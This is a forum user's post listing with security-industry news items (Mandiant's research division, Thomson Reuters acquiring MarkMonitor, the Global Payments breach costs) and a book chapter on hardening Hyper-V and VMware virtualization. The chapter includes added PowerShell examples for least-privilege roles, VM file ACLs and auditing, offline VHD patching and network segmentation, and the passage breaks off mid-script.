Everything posted by DarkyAngel
-
Mandiant Launches Research Division
In an announcement timed to coincide with the Black Hat conference last week in Las Vegas, Mandiant, a provider of security threat detection and response solutions, said that it has formed a new research division dubbed "Mandiant Labs" (M-Labs™). The Alexandria, Virginia-based company said its new research initiative combines its reverse engineers, malware analysts and researchers onto a single team in an effort to drive innovation and automation across the company to support Mandiant's products and services. "At Mandiant, we recognize that innovation is the key to staying one step ahead of the adversary," said Travis Reese, Mandiant president and chief operating officer. "Mandiant has already revolutionized how organizations detect, respond to, and contain targeted attacks. M-Labs concentrates many of the industry's top security experts in a single organization." M-Labs™ will be headed up by Jamie Butler, chief researcher and co-author of the book "Rootkits: Subverting the Windows Kernel," and Greg Jones, Director of Mandiant Labs. According to the company, the M-Labs team will focus its efforts in two specific areas:
- Intelligence Gathering and Analysis: works with Mandiant's consulting organization to collect, triage and analyze intelligence gathered from Mandiant's ongoing operations that track advanced attack groups, including new malware samples and other tools, techniques and protocols of those groups.
- Advanced Analytics & Service Delivery Automation: the M-Labs team works to develop new and faster ways to process the intelligence collected from the more than one million endpoints it monitors for clients, along with the hundreds of thousands of hours its consultants spend investigating security intrusions.
"Time counts when responding to advanced attackers," said Jamie Butler, Mandiant's chief researcher and the leader of the M-Labs team. "The work of the M-Labs team will help our clients know where the attackers are, how they are behaving and help anticipate their next moves." Source
-
Thomson Reuters to Acquire Online Brand Protector MarkMonitor
Business news and information giant Thomson Reuters announced on Thursday that it would acquire MarkMonitor, a provider of online brand protection services. San Francisco, California-based MarkMonitor helps companies protect their brands online, offering services such as tracking down counterfeit goods sold online, trademark infringements and "brandjacking", and it is even the domain name registrar and domain protector for some of the largest online companies, such as Apple and Google. The acquisition will put MarkMonitor under Thomson Reuters' Intellectual Property & Science business, adding to its portfolio of intellectual property solutions. The addition of MarkMonitor, the company says, will result in a suite of efficient and effective end-to-end brand protection solutions to assist customers in securing revenue and reputation. "Thomson Reuters already helps thousands of companies create, manage and protect hundreds of billions of dollars worth of intellectual property assets," said David Brown, president, Intellectual Property Solutions, Thomson Reuters. "With the addition of online brand protection solutions like those provided by MarkMonitor, we'll be able to deliver advanced technologies to keep customers one step ahead of brandjackers and reduce the enormous risk posed to brands online." "With the continued explosive growth of Internet, ecommerce and social network usage, the digital world provides an anonymous haven for criminals who harm brands' revenue and reputation, often at the expense of consumers," said Irfan Salim, MarkMonitor's president and chief executive officer. "Brands that take action to protect themselves by managing their domain name portfolios see real return on investment, including lower online advertising costs and higher revenue, along with greater customer satisfaction." MarkMonitor has over 400 employees in five countries and counts more than half of the Fortune 100 brands as customers.
MarkMonitor's employees, including Salim, will join Thomson Reuters. The acquisition is subject to standard regulatory approvals, and terms of the transaction were not disclosed. Source
-
Global Payments: Data Breach Cost Nearly $85 Million
Global Payments, Inc., the payment processing firm that disclosed a data breach back in late March, which the company ultimately said could have exposed up to 1.5 million card numbers, has shared details on the total cost of the incident so far. According to a July 26 statement issued by the company, one of the world's largest electronic transaction processing providers, the cost of the security incident is pegged at $84.4 million. "With the completion of our data intrusion investigation, GAAP results for the fourth quarter and full-year 2012 include a pre-tax charge of $84.4 million or $0.68 diluted earnings per share," the statement read. "This charge includes an estimate of charges from the card brands and investigation and remediation expenses." As a result of the breach, the company was removed from the lists of approved (PCI DSS-compliant) service providers maintained by several card brands, including Visa and MasterCard, something the company is working to fix. "A qualified security assessor is conducting the independent review required to return the company to the lists of PCI compliant service providers," the company said. The company has maintained that only Track 2 card data may have been stolen, and that cardholder names, addresses and social security numbers were not obtained by the criminals. Track 2 is the magnetic-stripe record (primary account number, expiration date, service code and discretionary data), so although it carries no name or address, it is enough to produce counterfeit magnetic-stripe cards. Source
-
Virtualization brings significant value to business managers and engineers attempting to keep pace with business pressure for additional servers. It enables maximum use of hardware resources while introducing increased flexibility in how organizations design and implement new solutions. However, it also introduces new security concerns. Until recently, organizations had to rely on security controls not specifically designed to protect virtual environments. Upgrades to VMware and Microsoft virtualization solutions now provide better monitoring and segregation of critical virtual systems.

In this chapter, I address general concerns related to virtualization security. I focus on what questions you should ask during a risk assessment of a virtualized environment, using Microsoft and VMware virtualization solutions as examples to demonstrate concepts.

The Basics
Before we begin, let's be sure we understand server virtualization technology as discussed in this chapter. Figure 10-1 depicts a high-level view of a VMware environment. Virtualizing servers allows various guest operating systems to run on a single hardware platform. The administrator can manage them from a single local or Web-connected computer.

Figure 10-1: VMware Configuration (VMware, n.d.)

Figure 10-2 drills a little deeper, showing the basic configuration of Microsoft Windows Server 2008 R2 virtualization. The Hyper-V layer is the hypervisor. Hypervisors exist in all enterprise-class virtualization solutions. They abstract the host server's hardware from the virtual machines. See Figure 10-3.

It is a very thin layer that:
- optimizes virtual machine (VM) interrupt calls
- manages shared memory
- generally enables VM use of system resources without having to access the host operating system, while managing those resources as configured in the management operating system

Figure 10-2: Microsoft Server Virtualization Components

Host Operating System
A virtualized hardware platform requires a foundational operating system (OS) into which system engineers install the virtualization components. In a Windows Server 2008 R2 environment, this requires a 64-bit version of Server Standard, Enterprise, or Datacenter, installed either as a standard (full) installation or as Server Core.

Figure 10-3: Microsoft Server Virtualization (Microsoft MSDN, 2011)

Partitions
Partitions are isolated operational entities within a virtualized environment. According to Microsoft MSDN (2011), "A partition is a logical unit of isolation, supported by the hypervisor, in which operating systems execute" (para. 2). A more workable definition describes partitions as the areas in which guest operating systems execute. However, not all partitions are equal.

The Root (a.k.a. Parent) partition (RP) is a mandatory instance of Windows Server. The virtualization stack resides here, and administrators use it to create, start, stop, and manage VM instances. It also differs from child partitions in its ability to directly access hardware resources (Microsoft MSDN, 2011). Although the RP is important, no production systems run within it. That is the role of child partitions.

Child (or guest) partitions (CP) contain production systems and operate just as their hardware peers do. The difference is their lack of direct access to resources provided by the underlying hardware platform. Instead, "they have a virtual view of the processor and run in a virtual memory address region that is private to each guest partition" (Microsoft MSDN, 2011, para. 4).
The RP and the hypervisor enable use of internal and external resources, including connectivity to a physical network. I could dig deeper into the various services and interfaces enabling Microsoft virtualization, but this high-level view is sufficient to begin a discussion about hypervisor and VM security. For details about the components depicted in Figure 10-3, see the supplied reference.

Manage the Attack Surface
The attack surface of a virtualized Microsoft server environment potentially consists of all the components discussed above, including all supporting files and drivers. Its actual size, however, depends on how well we perform the following:
- Harden the Host
- Harden the management and VM operating systems
- Configure all user roles with least-privilege access
- Use administrator roles to separate Host, RP, and VM management
- Secure VM files, including hard disks, backups, and archives
- Enable auditing
- Enable log management and monitoring
- Patch archived VMs
- Use VLANs and multiple network interface cards (NICs) to isolate management and VM access
- Use virtual networks to isolate VMs on the same Host
- Manage proliferation

Harden the Host
The Host consists of the hardware and operating system that underlie the hypervisor, as shown in Figure 10-2. The Host operating system is subject to all vulnerabilities expected in a Microsoft Server implementation, including those in any extra services. The best way to reduce the Host's attack surface is to eliminate the components that carry those vulnerabilities: simply don't install them. A Windows Server Core implementation is the best way to achieve this. Server Core is a minimal installation of Windows Server. According to Microsoft TechNet (2011), the purpose of Server Core is "...to eliminate any services and other features that are not essential for the support of certain commonly used server roles. For example, a Domain Name System (DNS) server really doesn't need Windows Internet Explorer installed on it because you wouldn't want to browse the Web from a DNS server for security reasons. And a DNS server doesn't even need a graphical user interface (GUI), because you can manage virtually all aspects of DNS either from the command line using the powerful Dnscmd.exe command, or remotely using the DNS Microsoft Management Console (MMC) snap-in" (Full vs. Server Core, para. 2).

Server Core is not without constraints. Third-party drivers and services may not work properly. If this is a problem for you, implement a full version of Server. Whether you use Core or a full implementation, use common sense and best practices to secure your Host. For more information on Server hardening practices, see Microsoft's Server 2008 R2 Security Baseline and the SANS guide to VMware virtualization hardening (http://www.sans.org/reading_room/analysts_program/vmware-guide-may-2010.pdf).

Harden the Management and VM Operating Systems
You must also harden the management operating system (MOS) running in the RP. The MOS is another instance of Windows Server, used by administrators to manage the overall virtualization environment. When deciding how much security is necessary, make sure MOS hardening is commensurate with the most sensitive information processed on any of the VMs on the MOS's Host: a compromise of the MOS is a compromise of every VM it manages.

In addition to the management operating system, each VM OS requires the same attention. Use the appropriate security recommendations for the virtual server OS and the server role. Treat each VM as you would a physical server; the same security policies apply.

Consider an important caveat when installing and configuring anti-virus software on the MOS: exclude the VM configuration directories and the virtual hard disk files (and, per Microsoft's Hyper-V guidance, the vmms.exe and vmwp.exe processes) from real-time scanning. A scanner that holds a VHD open while Hyper-V is trying to attach it can prevent the VM from starting. Scan the guest OS from inside the VM instead, with whatever AV agent that VM's role requires. Finally, the management server is not a production server.
Never run business applications there or use it to browse the Internet. Use it strictly as a tool to manage VMs. Restrict applications and browsing to virtual production servers.

Configure Admin Roles
To ensure separation of duties for security and compliance purposes, no one person should have the ability to perform all administrative tasks. For example, a hypervisor administrator should not have permission to manage VMs. Microsoft provides three pre-defined roles (in System Center Virtual Machine Manager, VMM) to help separate critical duties:
- Hyper-V administrator: using the management OS (MOS) in the RP, this role has permission to make global changes affecting all VMs on a Host, including network and storage configurations.
- Delegated administrator: this role provides additional granularity by restricting administrators to the Hosts or Host groups they must manage. Through VMM, they can manage VMs on any Host to which they have been assigned, but they have no access to other Hosts in the enterprise.
- Self-service user: the overall administrator can set access controls by VM or by sets of VMs using this role. It differs from the delegated administrator role in allowing privilege assignment at the VM level instead of control limited to the Host level.

In addition, consider separating physical security administration from hypervisor administration. In other words, the fact that an engineer has to maintain the Host hardware and OS does not mean he or she needs access to the VM management application. By default, local administrators of the MOS have full control of Hyper-V through the Hyper-V Manager MMC snap-in. For anything finer-grained, the Authorization Manager (AzMan) MMC snap-in provides granular control of individual administrative operations. Microsoft (2009) provides lists of these operations (see the following tables) you might consider when segregating management responsibility with your own roles (p.21).
Table 1: Hyper-V Service Operations [table=width: 500, class: grid, align: center] [tr] [td]Name[/td] [td]Description[/td] [/tr] [tr] [td]Read service configuration[/td] [td]Authorizes reading configuration of the Virtual Machine Management Service[/td] [/tr] [tr] [td]Reconfigure Service[/td] [td]Authorizes reconfiguration of Virtual Machine Management Service[/td] [/tr] [/table] Table 2: Hyper-V Network Operations [table=width: 500, class: grid, align: center] [tr] [td]Name[/td] [td]Description[/td] [/tr] [tr] [td]Bind External Ethernet Port[/td] [td]Authorizes binding to an external Ethernet port[/td] [/tr] [tr] [td]Connect Virtual Switch Port[/td] [td]Authorizes connecting to a virtual switch port[/td] [/tr] [tr] [td]Create Internal Ethernet Port[/td] [td]Authorizes creating an internal Ethernet port[/td] [/tr] [tr] [td]Create Virtual Switch[/td] [td]Authorizes creating a new virtual switch[/td] [/tr] [tr] [td]Create Virtual Switch Port[/td] [td]Authorizes creating a new virtual switch port[/td] [/tr] [tr] [td]Delete Internal Ethernet Port[/td] [td]Authorizes deleting an internal Ethernet port[/td] [/tr] [tr] [td]Delete Virtual Switch[/td] [td]Authorizes deleting a virtual switch[/td] [/tr] [tr] [td]Delete Virtual Switch Port[/td] [td]Authorizes deleting a virtual switch port[/td] [/tr] [tr] [td]Disconnect Virtual Switch Port[/td] [td]Authorizes disconnecting from a virtual switch port[/td] [/tr] [tr] [td]Modify Internal Ethernet Port[/td] [td]Authorizes modifying the internal Ethernet port settings[/td] [/tr] [tr] [td]Modify Switch Port Settings[/td] [td]Authorizes modifying the switch port settings[/td] [/tr] [tr] [td]Modify Switch Settings[/td] [td]Authorizes modifying the switch settings[/td] [/tr] [tr] [td]Change VLAN Configuration on Port[/td] [td]Authorizes modifying VLAN settings[/td] [/tr] [tr] [td]Unbind External Ethernet Port[/td] [td]Authorizes unbinding from an external Ethernet port[/td] [/tr] [tr] [td]View External Ethernet Ports[/td] 
[td]Authorizes viewing the available external Ethernet ports[/td] [/tr] [tr] [td]View Internal Ethernet Ports[/td] [td]Authorizes viewing the available internal Ethernet ports[/td] [/tr] [tr] [td]View LAN Endpoints[/td] [td]Authorizes viewing the LAN endpoints[/td] [/tr] [tr] [td]View Switch Ports[/td] [td]Authorizes viewing the available switch ports[/td] [/tr] [tr] [td]View Switches[/td] [td]Authorizes viewing the available switches[/td] [/tr] [tr] [td]View Virtual Switch Management Service[/td] [td]Authorizes viewing the Virtual Switch Management Service[/td] [/tr] [tr] [td]View VLAN Settings[/td] [td]Authorizes viewing the VLAN settings[/td] [/tr] [/table] Table 3: Hyper-V Virtual Machine Operations [table=width: 500, class: grid, align: center] [tr] [td]Name[/td] [td]Description[/td] [/tr] [tr] [td]Allow Input to Virtual Machine[/td] [td]Authorizes user to give input to the virtual machine[/td] [/tr] [tr] [td]Allow Output from Virtual Machine[/td] [td]Authorizes viewing the output from a virtual machine[/td] [/tr] [tr] [td]Change Virtual Machine Authorization Scope[/td] [td]Authorizes changing the scope of a virtual machine[/td] [/tr] [tr] [td]Create Virtual Machine[/td] [td]Authorizes creating a virtual machine[/td] [/tr] [tr] [td]Delete Virtual Machine[/td] [td]Authorizes deleting a virtual machine[/td] [/tr] [tr] [td]Pause and Restart Virtual Machine[/td] [td]Authorizes pause and restart of a virtual machine[/td] [/tr] [tr] [td]Reconfigure Virtual Machine[/td] [td]Authorizes reconfiguring a virtual machine[/td] [/tr] [tr] [td]Start Virtual Machine[/td] [td]Authorizes starting the virtual machine[/td] [/tr] [tr] [td]Stop Virtual Machine[/td] [td]Authorizes stopping the virtual machine[/td] [/tr] [tr] [td]View Virtual Machine Configuration[/td] [td]Authorizes viewing the virtual machine configuration[/td] [/tr] [/table] Secure VM files By default, Microsoft VM files are located in two folders: %programdata%\Microsoft\Windows\Hyper-V\ 
%PUBLIC%\Documents\Hyper-V\Virtual Hard Disks (C:\Users\Public\Documents\Hyper-V\Virtual Hard Disks on a default installation)

VMware Server stores VM files, by default, in the directory /var/lib/vmware/Virtual Machines; on ESXi they live on the VMFS datastore under /vmfs/volumes/<datastore>/<vm name>/. Regardless of where you store your VM files, consider protecting them with the following controls:
- Use network segments and access control lists to enforce least privilege for services and administrators. Block all other access.
- Encrypt the folders/directories listed above or the volume containing them.
- Ensure you have a current backup.
- Enable auditing.

When applying access controls, remember that a VM administrator might not need access to all VMs. For each virtual server administrator, allow access only to the files of the VMs he or she manages. Remember also that a user who can read a VHD can mount it offline and read every file on the guest's disk, bypassing the guest's own access controls entirely.

Enable Auditing
Auditing includes both file access and system monitoring. Windows TechNet (2009) provides audit policy implementation instructions. All files associated with Microsoft VM and RP configuration and data storage are candidates for auditing. In addition to file access auditing, use Microsoft System Center Operations Manager, or a similar monitoring tool, to alert on unwanted or high-risk behavior.

Enable Monitoring and Log Management
Most (hopefully all) security practitioners understand the importance of monitoring and logging network and device activity. Solutions exist in many data centers to centralize, correlate, and manage events. However, traditional (pre-virtualization) solutions cannot see what is happening in, around, and between VMs on the same hardware platform. The ability to see inside the virtual space with firewalls, IPS, IDS, and log management systems is called introspection. Today's hypervisors usually ship with good logging capabilities. The Syslog Collector in VMware vSphere 5 (http://blogs.vmware.com/esxi/2011/07/setting-up-the-esxi-syslog-collector.html) is a good example: it aggregates the ESXi hosts' own logs for storage on any server you choose (guest OS logs still need their own agent or syslog forwarding). Regardless of how you collect your logs, they should make their way to your SIEM application.
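The following is an added example for the Configure Admin Roles section and the operations in Tables 1 to 3; it is not code from the chapter or from Microsoft. It uses the Authorization Manager (AzMan) COM interface, which is how Hyper-V on Windows Server 2008 R2 stores its role definitions, to build a "VM Operator" role that can start, stop and use the console of VMs but cannot create, delete or reconfigure them, and has none of the network or service operations from Tables 1 and 2. The store path and the application name "Hyper-V services" are the Hyper-V defaults; the group CONTOSO\VM-Operators is a hypothetical name.

```powershell
# Added example (not from the chapter): least-privilege Hyper-V operator role via AzMan.
# Run elevated in the management OS of the root partition (Windows Server 2008 R2).
# Assumptions: default Hyper-V store path and application name; CONTOSO\VM-Operators is hypothetical.

$StorePath = Join-Path $env:ProgramData 'Microsoft\Windows\Hyper-V\InitialStore.xml'
$Operator  = 'CONTOSO\VM-Operators'      # hypothetical domain group

# Day-to-day operations only (names exactly as in Table 3). Deliberately absent:
# Create/Delete/Reconfigure Virtual Machine, Change Virtual Machine Authorization Scope,
# and every network (Table 2) and service (Table 1) operation.
$OperatorOps = @(
    'Allow Input to Virtual Machine',
    'Allow Output from Virtual Machine',
    'Pause and Restart Virtual Machine',
    'Start Virtual Machine',
    'Stop Virtual Machine',
    'View Virtual Machine Configuration'
)

$Store = New-Object -ComObject AzRoles.AzAuthorizationStore
$Store.Initialize(0, "msxml://$StorePath")      # 0 = open the existing XML store
$App = $Store.OpenApplication('Hyper-V services')

# AzMan model: operations are grouped into a task, tasks into a role, members into the role.
$Task = $App.CreateTask('VM Operator Task')
foreach ($Op in $OperatorOps) { $Task.AddOperation($Op) }
$Task.Submit()

$Role = $App.CreateRole('VM Operator')
$Role.AddTask('VM Operator Task')
$Role.AddMemberName($Operator)
$Role.Submit()
$App.Submit()

# Verification for the reviewer: every role with the operations it resolves to. The only
# role that should carry Create/Delete/Reconfigure is the built-in Administrator role.
# (Role.Tasks and Task.Operations return arrays of names, not objects.)
foreach ($R in $App.Roles) {
    $Ops = foreach ($T in $R.Tasks) { $App.OpenTask($T).Operations }
    '{0}: {1}' -f $R.Name, (($Ops | Sort-Object -Unique) -join ', ')
}
```

Two caveats. The role above applies at the application scope, that is, to every VM on the Host; to confine an operator to specific VMs, create an AzMan scope and move those VMs into it (that is what the "Change Virtual Machine Authorization Scope" operation in Table 3 controls). And AzMan only governs Hyper-V's own operations: a member of the local Administrators group on the MOS can edit the store itself, so operators must not be local administrators of the root partition. From Windows Server 2012 onward the AzMan mechanism is deprecated in favor of the local "Hyper-V Administrators" group.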
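As an added example for the Secure VM files and Enable Auditing sections above (this is not the chapter's own code or a Microsoft script), the following script inventories where each VM's files really are, removes inherited permissions from the default VHD folder, grants per-VM access to the team that manages that VM, puts a SACL on the configuration and disk trees, and enables the audit subcategory without which the SACL is never evaluated. The groups CONTOSO\HyperV-Admins and CONTOSO\VM-Admins-Finance and the VM fin-db01 are hypothetical; the inventory step uses the Hyper-V PowerShell module (Windows Server 2012 and later).

```powershell
# Added example (not from the chapter): lock down and audit Hyper-V VM file locations.
# Run elevated in the management OS of the root partition.
# Hypothetical names: CONTOSO\HyperV-Admins, CONTOSO\VM-Admins-Finance, VM fin-db01.

$VhdRoot    = Join-Path $env:PUBLIC      'Documents\Hyper-V\Virtual Hard Disks'
$ConfigRoot = Join-Path $env:ProgramData 'Microsoft\Windows\Hyper-V'

# 1. Inventory: where does each VM actually keep its configuration and disks? Files that
#    have drifted away from the default paths are the ones an ACL review forgets.
function Get-VMFileInventory {
    foreach ($vm in Get-VM) {
        foreach ($disk in $vm.HardDrives) {
            [pscustomobject]@{ VM = $vm.Name; Config = $vm.ConfigurationLocation; Disk = $disk.Path }
        }
    }
}

# 2. Least privilege on the disk folder. /inheritance:r drops inherited ACEs (e.g. Users)
#    but keeps explicit ones, including the per-VM "NT VIRTUAL MACHINE\<VM GUID>" ACE that
#    Hyper-V adds when a disk is attached; removing that ACE makes the VM fail to start.
icacls $VhdRoot /inheritance:r
icacls $VhdRoot /grant 'SYSTEM:(OI)(CI)F' 'BUILTIN\Administrators:(OI)(CI)F' 'CONTOSO\HyperV-Admins:(OI)(CI)F'

# Per-VM administrators get Modify (not Full) on only the disks of the VMs they manage,
# so they cannot re-ACL the file to widen their own access.
icacls (Join-Path $VhdRoot 'fin-db01.vhdx') /inheritance:r /grant 'SYSTEM:F' 'CONTOSO\HyperV-Admins:F' 'CONTOSO\VM-Admins-Finance:M'

# 3. Auditing: SACL for writes, deletes and permission/ownership changes on both trees.
function Enable-VMFileAudit {
    param([Parameter(Mandatory)][string]$Path)
    $acl  = Get-Acl -Path $Path -Audit
    $rule = New-Object System.Security.AccessControl.FileSystemAuditRule(
        'Everyone',
        [System.Security.AccessControl.FileSystemRights]'Write, Delete, ChangePermissions, TakeOwnership',
        [System.Security.AccessControl.InheritanceFlags]'ContainerInherit, ObjectInherit',
        [System.Security.AccessControl.PropagationFlags]::None,
        [System.Security.AccessControl.AuditFlags]'Success, Failure')
    $acl.AddAuditRule($rule)
    Set-Acl -Path $Path -AclObject $acl
}
Enable-VMFileAudit -Path $ConfigRoot
Enable-VMFileAudit -Path $VhdRoot
# Without the subcategory enabled, the SACLs above generate nothing.
auditpol /set /subcategory:"File System" /success:enable /failure:enable

# 4. What the audit produces: Security event 4663 (an attempt was made to access an object)
#    naming one of the protected paths. Forward these to the SIEM rather than reading them here.
function Get-VMFileAccessEvents {
    param([int]$Hours = 24)
    $filter = @{ LogName = 'Security'; Id = 4663; StartTime = (Get-Date).AddHours(-$Hours) }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue |
        Where-Object { $_.Message -match [regex]::Escape($ConfigRoot) -or $_.Message -match [regex]::Escape($VhdRoot) } |
        Select-Object TimeCreated, @{ n = 'Detail'; e = { ($_.Message -split "`n")[0] } }
}

Get-VMFileInventory
Get-VMFileAccessEvents -Hours 24
```

The ordering matters: set the ACLs while the VMs are stopped, then start each one once to confirm Hyper-V can still open its disks before considering the change done.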
Packets must pass through an IPS so anomalous traffic is blocked. IPS solutions for virtual spaces are emerging, but many organizations are not prepared to configure additional devices, virtual or not. Figure 10-4 shows an alternative configuration: all traffic between VMs must pass through a traditional IPS appliance before reaching its target. One downside to this approach is propagation delay. However, the delay usually presents less risk than a lack of introspection. Note that this only works if VMs on the same Host cannot reach each other directly: each VM (or tier) needs its own VLAN or virtual switch, so that inter-VM traffic is forced out through the physical NIC to the appliance and back instead of being switched inside the Host.

Figure 10-4: Routing VM Traffic through External Device (Olzak, 2011)

Patch Archived VMs
Physical and virtual servers require the same administrative, logical, and physical controls, including participation in an aggressive patching process. Patching running VMs is straightforward; they look like any other server to your patching application. But what about VMs not currently running? It is never a good idea to add an unpatched server to a production environment, yet if you have archived a VM for several months, it might lack critical security patches. Microsoft provides a tool for this. Using Microsoft's Virtual Machine Servicing Tool (VMST) 3.0, you can apply updates and patches to any archived VM. Use of this tool requires one of the following:
- System Center Virtual Machine Manager 2008 R2
- System Center Configuration Manager 2007 SP2
- Windows Server Update Services 3.0 SP2

Figure 10-5 depicts the patching/update process. Each archived VM is started, updated, and then stored and deactivated. Note the requirement for a maintenance host. Place this server in a restricted network segment, and ensure its security is commensurate with the highest classification of data in your enterprise.

Figure 10-5: Virtual Machine Servicing Tool Process (Microsoft TechNet, 2010, Servicing Offline Virtual Machines in a VMM Library)

If auto-patching of suspended VMs is not an option, create a procedure to include their files in your patch application activities.
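One such procedure, as an added example that is not part of the chapter and is not the Virtual Machine Servicing Tool: service the archived VHD/VHDX files offline with the DISM PowerShell module (Windows 8 / Windows Server 2012 and later), so the guest is patched before it is ever booted again. The library path, update folder and mount directory below are hypothetical, and the script is meant to run elevated on the isolated maintenance host, not on the production management OS.

```powershell
# Added example (not from the chapter): offline servicing of archived virtual hard disks with DISM.
# Assumptions: D:\VM-Library holds the archived .vhd/.vhdx files, D:\Updates holds .msu/.cab
# updates already downloaded for the guests' OS build, C:\Mount is a scratch mount point.
# Do not service a disk that is the parent of a differencing chain (a VM with checkpoints):
# merge the checkpoints first, or the chain is corrupted.

$Library  = 'D:\VM-Library'
$Updates  = 'D:\Updates'
$MountDir = 'C:\Mount'

function Update-ArchivedDisk {
    param([Parameter(Mandatory)][string]$DiskPath)

    New-Item -ItemType Directory -Path $MountDir -Force | Out-Null
    # A VHD exposes a single image, so -Index 1; the disk is mounted read/write.
    Mount-WindowsImage -ImagePath $DiskPath -Index 1 -Path $MountDir | Out-Null
    try {
        $before = @(Get-WindowsPackage -Path $MountDir).Count
        $applied = 0
        foreach ($pkg in Get-ChildItem -Path $Updates -Include *.msu, *.cab -Recurse) {
            # Add-WindowsPackage stages the update into the offline image. An update that does
            # not apply to this build throws; record it and continue with the next package.
            try {
                Add-WindowsPackage -Path $MountDir -PackagePath $pkg.FullName -ErrorAction Stop | Out-Null
                $applied++
            }
            catch { Write-Warning ("{0} not applied to {1}: {2}" -f $pkg.Name, $DiskPath, $_) }
        }
        $after = @(Get-WindowsPackage -Path $MountDir).Count
        # Evidence for the change ticket: what went in, and the package count before/after.
        [pscustomobject]@{
            Disk           = $DiskPath
            Applied        = $applied
            PackagesBefore = $before
            PackagesAfter  = $after
            ServicedOn     = Get-Date
        }
    }
    finally {
        # -Save commits the changes to the VHD; use -Discard instead after a failed run.
        Dismount-WindowsImage -Path $MountDir -Save | Out-Null
    }
}

# Service every archived disk and keep the record beside the library.
Get-ChildItem -Path $Library -Include *.vhd, *.vhdx -Recurse |
    ForEach-Object { Update-ArchivedDisk -DiskPath $_.FullName } |
    Export-Csv -Path (Join-Path $Library 'offline-servicing.csv') -NoTypeInformation
```

Offline servicing installs the package payload but some updates only finish on first boot, so still let the VM boot once on the isolated maintenance network and run a vulnerability scan against it before it returns to production.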
Use hardware completely isolated (logically or physically) from the production network, and launch, patch, and suspend all affected VMs.

Isolate VMs and the RP
Isolating devices in a virtual environment follows the principle of network segmentation. Segmenting a network allows only explicitly permitted network traffic to reach a device. In a virtualized environment, there are two segmentation methods: physical and virtual.

Physical Segmentation
The final step in configuring a Host is connecting it and its VMs to the network. However, not all network connections are the same. Network segmentation is necessary to ensure only authorized traffic arrives at the most sensitive areas. This requires at least two network interface cards (NICs) installed in the Host. In addition, consider placing only VMs with the same required trust level on any given hardware platform.

At the most basic level, access to the management server on each hardware platform should be over a dedicated management segment connected to one of the NICs. Using physical VLANs, this is simple and provides the first layer of security against unauthorized access to the hypervisor configuration. One or more additional VLANs are then necessary to connect the VMs via the remaining NICs. Figure 10-6 shows the Microsoft physical NIC assignment window. When configuring the Hyper-V server role, you are asked which NICs to assign to the VMs; an unchecked NIC is left to the MOS.

Figure 10-6: NIC Assignment

Virtual Segmentation
A virtual switch is created for each of the NICs you select in the process above, as shown in Figure 10-7. You can also configure your own. According to Panek (2009), "Virtual switches help Hyper-V secure and control the network packets that enter and exit the virtual machines. You can limit the communications to or from a virtual machine and the VLAN. When setting up your network adapters, you can associate a single virtual switch with that adapter" (p. 98).

The Hyper-V administrator creates one or more virtual NICs for each VM and connects them to virtual switch ports. Virtual switches function like physical switches, including allowing creation of VLANs to control traffic flow. Three types of virtual networks (VNs) are possible in a Microsoft Windows Server virtualization implementation:
- External VNs are bound to a physical NIC and allow VMs (and, if you choose, the MOS) to communicate over the physical network.
- Internal VNs are not bound to a physical NIC and have no access to the outside world. They allow VMs to communicate with each other and with the RP, and are typically used for testing.
- Private VNs connect VMs on the same Host only to each other; neither the MOS nor the physical network can reach them. This is the most granular form of virtual segmentation.

It isn't always necessary for VMs on a single Host to access each other. In these cases, isolate them.

Figure 10-7: Virtual Switches

Figure 10-8 depicts a VLAN configuration using virtual switches in Windows Server 2012 to manage access across multiple VMs on the same hardware platform. Whether using virtual or physical switches, VLAN segmentation as described in Chapter 5 is a crucial part of attack surface reduction and isolation of servers sharing hardware resources.

Figure 10-8: Windows Server 2012 Virtual Switches (Microsoft, 2012, p. 10)

Manage Proliferation
Virtualization is a great productivity tool... if not abused. There is a temptation to use it for quickly instantiating servers outside established change management processes. When this happens, all the oversight that ensures attack surface mitigation is bypassed. Over time, out-of-control virtualization can become a bigger risk than a benefit. Keeping risk low is not difficult. Ensure any server showing up on your network is quickly identified and its authorization confirmed. Create policies that ensure all virtual server implementations follow a strict change management process.
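As an added example for the Physical Segmentation, Virtual Segmentation and Manage Proliferation sections above (not the chapter's own code, and not a Microsoft script), the following uses the Hyper-V PowerShell module (Windows Server 2012 and later) to build the segmented layout just described and then audits the Host for the two things change management most often misses: VMs nobody approved, and VM adapters that sit on the external switch without a VLAN tag or share a switch with the management OS. Adapter names, switch names, VLAN IDs and the approved-VM list are hypothetical.

```powershell
# Added example (not from the chapter): segmented Hyper-V switch layout plus a proliferation
# and isolation audit. Run elevated in the management OS. Assumptions: "Ethernet 1" is the
# management NIC, "Ethernet 2" the VM NIC; web01/db01, VLAN 110 and $ApprovedVMs are hypothetical.

# --- Physical segmentation: the management NIC ("Ethernet 1") is never bound to a VM switch,
#     and the VM switch is created with -AllowManagementOS $false so the MOS has no presence on it.
New-VMSwitch -Name 'VM-External' -NetAdapterName 'Ethernet 2' -AllowManagementOS $false | Out-Null

# --- Virtual segmentation: a private switch for traffic that must never leave the Host.
New-VMSwitch -Name 'VM-Private-Backend' -SwitchType Private | Out-Null

# Web tier: one adapter on the external switch, tagged VLAN 110; a second adapter on the
# private switch for database access. DB tier: private switch only, no path to the outside.
Connect-VMNetworkAdapter -VMName 'web01' -SwitchName 'VM-External'
Set-VMNetworkAdapterVlan -VMName 'web01' -Access -VlanId 110
Add-VMNetworkAdapter     -VMName 'web01' -SwitchName 'VM-Private-Backend' -Name 'backend'
Connect-VMNetworkAdapter -VMName 'db01'  -SwitchName 'VM-Private-Backend'

# --- Audit: one row per VM adapter, with findings that should each become a ticket. ---
$ApprovedVMs = @('web01', 'db01')   # hypothetical export from the CMDB / change records

function Get-HostVMAudit {
    foreach ($vm in Get-VM) {
        foreach ($nic in Get-VMNetworkAdapter -VM $vm) {
            $vlan = Get-VMNetworkAdapterVlan -VMNetworkAdapter $nic
            $sw   = if ($nic.SwitchName) { Get-VMSwitch -Name $nic.SwitchName } else { $null }
            $findings = @()

            # Proliferation: a VM that change management never saw.
            if ($vm.Name -notin $ApprovedVMs) { $findings += 'VM not in approved list' }

            # Isolation: untagged on the external switch means it can talk to every VLAN the
            # physical port carries; sharing a switch with the MOS exposes the management path.
            if ($sw -and $sw.SwitchType -eq 'External' -and $vlan.OperationMode -eq 'Untagged') {
                $findings += 'external switch without VLAN tag'
            }
            if ($sw -and $sw.AllowManagementOS) { $findings += 'switch shared with management OS' }

            [pscustomobject]@{
                VM         = $vm.Name
                Adapter    = $nic.Name
                Switch     = $nic.SwitchName
                SwitchType = if ($sw) { $sw.SwitchType } else { 'disconnected' }
                VlanMode   = $vlan.OperationMode
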